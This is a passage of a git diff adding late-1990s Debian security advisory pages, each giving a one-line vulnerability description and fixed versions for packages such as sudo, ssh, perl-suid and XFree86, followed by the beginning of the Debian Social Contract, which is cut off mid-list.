"-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>perl-suid +<DT>Brief description: + <DD>Users can gain root access with suidperl version 5.003 +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>perl-suid 5.003.07-10 or later. +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/sperl2.html b/english/security/sperl2.html new file mode 100644 index 00000000000..01f86e871a6 --- /dev/null +++ b/english/security/sperl2.html @@ -0,0 +1,38 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>17 April 1997 +<DT>Affected package: + <DD>perl-suid +<DT>Brief description: + <DD>Buffer overflow in sperl 5.003 +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>perl 5.003.07-10 +<DT>Date entered distribution: + <DD>Debian 1.2.11, released 22 April 1997, has this package +<DT>For more information: + <DD><A HREF="info/sperl-5.003.html">BugTraq</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/ssh.html b/english/security/ssh.html new file mode 100644 index 00000000000..8d68ff0a988 --- /dev/null +++ b/english/security/ssh.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>ssh +<DT>Brief description: + <DD>ssh allowed non-privileged users to forward privileged ports. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>ssh 1.2.21-1 or later, available at ftp://nonus.debian.org/debian-non-US/ +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/sudo.html b/english/security/sudo.html new file mode 100644 index 00000000000..180438c14a9 --- /dev/null +++ b/english/security/sudo.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>12 Jan 1998 +<DT>Affected packages: + <DD>sudo +<DT>Brief description: + <DD>sudo allowed users to run any root command +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>sudo 1.5.4-1.1 in bo or sudo 1.5.4-2 in hamm +<DT>Entered Distribution: + <DD>13 Jan 1998 +</DL> + +<P><SMALL>Last Modified: 20 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/super.html b/english/security/super.html new file mode 100644 index 00000000000..ba59d05c923 --- /dev/null +++ b/english/security/super.html @@ -0,0 +1,85 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 08 May, 1998 +<P> +<DT>Affected packages: super prior to 3.11.6 +<P> +<DT>Brief description: files may be displayed without permissions + <P><DD>We have received a report that versions super were displaying files +even if the particular user should not be able to read them. This has +been forwarded to the upstream author, William Deich, who has released +a fixed version. + <P><DD>If you have super installed on your machines we suggest that you +upgrade immetiately. The problem is fixed in any 3.11.6 version of +super. + <P>After downloading the correct package, install using "dpkg -i (package_name).deb" +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/bo-updates/super_3.11.6-0bo1.1.diff.gz + <DD><SMALL>(MD5 checksum: 0b8d5b4358bcb1ac3a838cb7ad876b86)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/super_3.11.6-0bo1.1.dsc + <DD><SMALL>(MD5 checksum: 9c6ca88b260a93dbab4e83b79824fe48)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/super_3.11.6.orig.tar.gz + <DD><SMALL>(MD5 checksum: 8fe1a6e8f124e0183050f7703b310789)</SMALL><P> + + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/admin/super_3.11.6-1.deb + <DD><SMALL>(MD5 checksum: d00c22e8e17af827fded6549421901ec)</SMALL> +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/admin/super_3.11.6-1.diff.gz + <DD><SMALL>(MD5 checksum: 07b9b0bc4052584b658a377375f767df)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/admin/super_3.11.6-1.dsc + <DD><SMALL>(MD5 checksum: 647b134fd43452bdc8f0acd55b14ff5f)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/admin/super_3.11.6.orig.tar.gz + <DD><SMALL>(MD5 checksum: )</SMALL>56e3a8a2c0e22f524059529057b52adc + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/admin/super_3.11.6-1.deb + <DD><SMALL>(MD5 checksum: d00c22e8e17af827fded6549421901ec)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/admin/super_3.11.6-1.deb + <DD><SMALL>(MD5 checksum: 0dd4a727c4554f594b115c6e410c0b50)</SMALL> + +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/admin/super_3.11.6-1.deb + <DD><SMALL>(MD5 checksum: 0dd4a727c4554f594b115c6e410c0b50)</SMALL> + +<P> PowerPC architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: May 16, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/superprobe.html b/english/security/superprobe.html new file mode 100644 index 00000000000..4c6d4fb6d7f --- /dev/null +++ b/english/security/superprobe.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>March 4, 1997 +<DT>Affected packages: + <DD>xbase +<DT>Brief description: + <DD>SuperProbe (of XFree86) contains a number of buffer overflows +<DT>Vulnerable: + <DD>No. SuperProbe is not setuid in Debian. +<DT>For more information: + <DD><A HREF="info/superprobe.html">BugTraq</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/svgalib.html b/english/security/svgalib.html new file mode 100644 index 00000000000..f7873484f0a --- /dev/null +++ b/english/security/svgalib.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>svgalib +<DT>Brief description: + <DD>svgalib didn't properly give up root priviledges. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>svgalib 1.2.10-5, available in bo-updates. +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/talkd.html b/english/security/talkd.html new file mode 100644 index 00000000000..451979eabb7 --- /dev/null +++ b/english/security/talkd.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>January 27, 1997 +<DT>Brief description: + <DD>talkd does not check hostname length +<DT>Vulnerable: + <DD> Fixed in 1.2.7. +<DT>For more information: + <DD> <a href="info/talkd.html">CERT</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/tar.html b/english/security/tar.html new file mode 100644 index 00000000000..99eb59f348b --- /dev/null +++ b/english/security/tar.html @@ -0,0 +1,31 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Brief description: + <DD>GNU tar sometimes unintentionally creates setuid-root executables. +<DT>Vulnerable: + <DD>Not by default - but if the "nobody" user has uid 6553<b>5</b>, yes. +<DT>Fixed in: + <DD>tar 1.11.8-8 +<DT>Entered Distribution: + <DD>6 Feb 1997 + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/teardrop.html b/english/security/teardrop.html new file mode 100644 index 00000000000..23a8cb4b581 --- /dev/null +++ b/english/security/teardrop.html @@ -0,0 +1,35 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>kernel-package +<DT>Brief description: + <DD>"teardrop" attack. Problem with IP defragmenting code can allow others to crash + your machine +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>Linux Kernel 2.0.32 or later +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/template.html b/english/security/template.html new file mode 100644 index 00000000000..91429ada9a1 --- /dev/null +++ b/english/security/template.html @@ -0,0 +1,79 @@ +!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: non-public - ; public - +<P> +<DT>Affected packages: +<P> +<DT>Brief description: + <DD> +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL><P> + + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> +<P> +<DT>Fixed in: + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> PowerPC architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> +<P> +<DT>Entered Distribution: April 19, 1998 +</DL> + +<P><SMALL>Last Modified: May 11, 1998. +Copyright ©1997, 1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/textutils.html b/english/security/textutils.html new file mode 100644 index 00000000000..ca13e60fd85 --- /dev/null +++ b/english/security/textutils.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>17 Feb 1998 +<DT>Affected packages: + <DD>textutils +<DT>Brief description: + <DD>sort and tac vulnerable to symlink attack +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>1.22-2.3 (bo) and 1.22-2.4 (hamm) +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: 27 Mar 1998 +Copyright ©1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/tftp.html b/english/security/tftp.html new file mode 100644 index 00000000000..117de13b09d --- /dev/null +++ b/english/security/tftp.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>March 23, 1997 +<DT>Affected packages: + <DD>netstd +<DT>Brief description: + <DD>tftpd allows retrieval of files with ".." in their path +<DT>Vulnerable: + <DD>No +<DT>For more information: + <DD><A HREF="info/tftpd.html">linux-security</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/xfree.html b/english/security/xfree.html new file mode 100644 index 00000000000..625b0204e2a --- /dev/null +++ b/english/security/xfree.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>xserver* +<DT>Brief description: + <DD>Problem with bad permissions on control socket for X +<DT>Vulnerable: + <DD>No +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/xfree1.html b/english/security/xfree1.html new file mode 100644 index 00000000000..6965195dc67 --- /dev/null +++ b/english/security/xfree1.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>xserver-* +<DT>Brief description: + <DD>Vulnerability in XFree86 +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>XFree86 3.3. This package is distributed with Debian 1.3.1. +<DT>Date Entered distribution: + <DD>July 2, 1997 +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/xfree2.html b/english/security/xfree2.html new file mode 100644 index 00000000000..cfd3a8f95aa --- /dev/null +++ b/english/security/xfree2.html @@ -0,0 +1,35 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>xserver-* +<DT>Brief description: + <DD>XF86_* servers don't check permission on alternate config file. This enables reading + of the first line of any file by ordinary users. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>XF86_* 3.3.1-6 and later. A wrapper program is used to avoid problems such as this. +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/xfree3.html b/english/security/xfree3.html new file mode 100644 index 00000000000..03c856b3b76 --- /dev/null +++ b/english/security/xfree3.html @@ -0,0 +1,30 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Brief description: + <DD>user X startup scripts sometimes create exploitable file in /tmp +<DT>Vulnerable: + <DD> No +<DT>For more information: + <DD> <a href="info/xfree3.html">Alan Cox</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/social_contract.wml b/english/social_contract.wml new file mode 100644 index 00000000000..a9091f376e0 --- /dev/null +++ b/english/social_contract.wml @@ -0,0 +1,147 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — A Social Contract" + + <!-- -*- Mode: Sgml -*- + contract.html + Author : Manoj Srivastava ( srivasta@tiamat.datasync.com ) + Created On : Wed Jul 2 12:47:56 1997 + Created On Node : tiamat.datasync.com + Last Modified By : Manoj Srivastava + Last Modified On : Wed Jul 2 13:35:07 1997 + Last Machine Used: tiamat.datasync.com + Update Count : 21 + Status : Unknown, Use with caution! + HISTORY : + Description : + $Id$ + --> + +<H1>Debian Social Contract</H1> + +<P>We are Software In The Public Interest, producers of the Debian GNU/Linux +system. This is the “<strong>social contract</strong>” we offer +to the free software community. + +<HR> +<H2>"Social Contract" with the Free Software Community</H2> +<OL> + <LI><P><strong>Debian Will Remain 100% Free Software</strong> + <P>We promise to keep the Debian GNU/Linux Distribution + entirely free software. As there are many definitions of + free software, we include the guidelines we use to determine + if software is "<em>free</em>" below. We will support our + users who develop and run non-free software on Debian, but + we will never make the system depend on an item of non-free + software.</P> + <LI><strong>We Will Give Back to the Free Software Community</strong> + <P>When we write new components of the Debian system, we will + license them as free software. We will make the best system + we can, so that free software will be widely distributed and + used. We will feed back bug-fixes, improvements, user + requests, etc. to the "<em>upstream</em>" authors of software + included in our system.</P> + <LI><P><strong>We Won't Hide Problems</strong> + <P>We will keep our entire bug-report database open for public + view at all times. Reports that users file on-line will + immediately become visible to others.</P> + <LI><P><strong>Our Priorities are Our Users and Free Software</strong> + <P>We will be guided by the needs of our users and the + free-software community. We will place their interests first + in our priorities. We will support the needs of our users + for operation in many different kinds of computing + environment. We won't object to commercial software that is + intended to run on Debian systems, and we'll allow others to + create value-added distributions containing both Debian and + commercial software, without any fee from us. To support + these goals, we will provide an integrated system of + high-quality, 100% free software, with no legal restrictions + that would prevent these kinds of use.</P> + <LI><P><strong>Programs That Don't Meet Our Free-Software Standards</strong> + <P>We acknowledge that some of our users require the use of + programs that don't conform to the + <a href="#guidelines">Debian Free Software Guidelines</a>. + We have created "<tt>contrib</tt>" and "<tt>non-free</tt>" + areas in our FTP archive for this software. The software in + these directories is not part of the Debian system, although + it has been configured for use with Debian. We encourage CD + manufacturers to read the licenses of software packages in + these directories and determine if they can distribute that + software on their CDs. Thus, although non-free software + isn't a part of Debian, we support its use, and we provide + infrastructure (such as our bug-tracking system and mailing + lists) for non-free software packages. + </OL> + <HR> + <H2><a name="guidelines">The Debian Free Software Guidelines</a></H2> + <OL> + <LI><P><strong>Free Redistribution</strong> + <P>The license of a Debian component may not restrict any + party from selling or giving away the software as a + component of an aggregate software distribution containing + programs from several different sources. The license may not + require a royalty or other fee for such sale.</P> + <LI><P><strong>Source Code</strong> + <P>The program must include source code, and must allow + distribution in source code as well as compiled + form.</P> + <LI><P><strong>Derived Works</strong> + <P>The license must allow modifications and derived works, and + must allow them to be distributed under the same terms as + the license of the original software.</P> + <LI><P><strong>Integrity of The Author's Source Code</strong> + <P>The license may restrict source-code from being distributed + in modified form _<strong>only</strong>_ if the license allows + the distribution of "<tt>patch files</tt>" with the source + code for the purpose of modifying the program at build + time. The license must explicitly permit distribution of + software built from modified source code. The license may + require derived works to carry a different name or version + number from the original software. (<em>This is a + compromise. The Debian group encourages all authors to not + restrict any files, source or binary, from being + modified.</em>)</P> + <LI><P><strong>No Discrimination Against Persons or Groups</strong> + <P>The license must not discriminate against any person or + group of persons.</P> + <LI><P><strong>No Discrimination Against Fields of Endeavor</strong> + <P>The license must not restrict anyone from making use of the + program in a specific field of endeavor. For example, it may + not restrict the program from being used in a business, or + from being used for genetic research.</P> + <LI><P><strong>Distribution of License</strong> + <P>The rights attached to the program must apply to all to + whom the program is redistributed without the need for + execution of an additional license by those + parties.</P> + <LI><P><strong>License Must Not Be Specific to Debian</strong> + <P>The rights attached to the program must not depend on the + program's being part of a Debian system. If the program is + extracted from Debian and used or distributed without Debian + but otherwise within the terms of the program's license, all + parties to whom the program is redistributed should have the + same rights as those that are granted in conjunction with + the Debian system.</P> + <LI><P><strong>License Must Not Contaminate Other Software</strong> + <P>The license must not place restrictions on other software + that is distributed along with the licensed + software. For example, the license must not insist that all + other programs distributed on the same medium must be free + software.</P> + <LI><P><strong>Example Licenses</strong> + <P>The "<strong><a href="http://www.gnu.org/copyleft/gpl.html">GPL</a></strong>", + "<strong><a href="misc/bsd.license">BSD</a></strong>", and + 